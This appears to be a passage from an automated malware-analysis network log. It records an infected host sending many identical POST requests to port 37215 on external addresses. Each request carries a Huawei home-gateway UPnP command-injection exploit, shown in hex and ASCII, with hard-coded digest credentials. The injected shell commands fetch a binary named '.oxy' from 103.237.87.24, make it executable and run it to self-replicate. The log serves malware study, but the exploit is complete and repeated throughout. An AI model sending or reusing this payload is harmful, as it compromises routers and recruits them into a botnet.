20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1632192.168.2.133895241.251.17.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506745100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1633192.168.2.134422241.162.26.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506833076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1634192.168.2.1353974147.194.46.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506887913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1635192.168.2.1335706197.79.182.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507050991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1636192.168.2.1352876197.67.254.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507082939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1637192.168.2.134913841.179.72.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507102966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1638192.168.2.1335082157.173.63.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507134914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1639192.168.2.1357738157.122.52.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507144928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1640192.168.2.1341544197.95.135.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507181883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1641192.168.2.1337188197.199.81.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507220984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1642192.168.2.1342368137.120.12.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507251978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
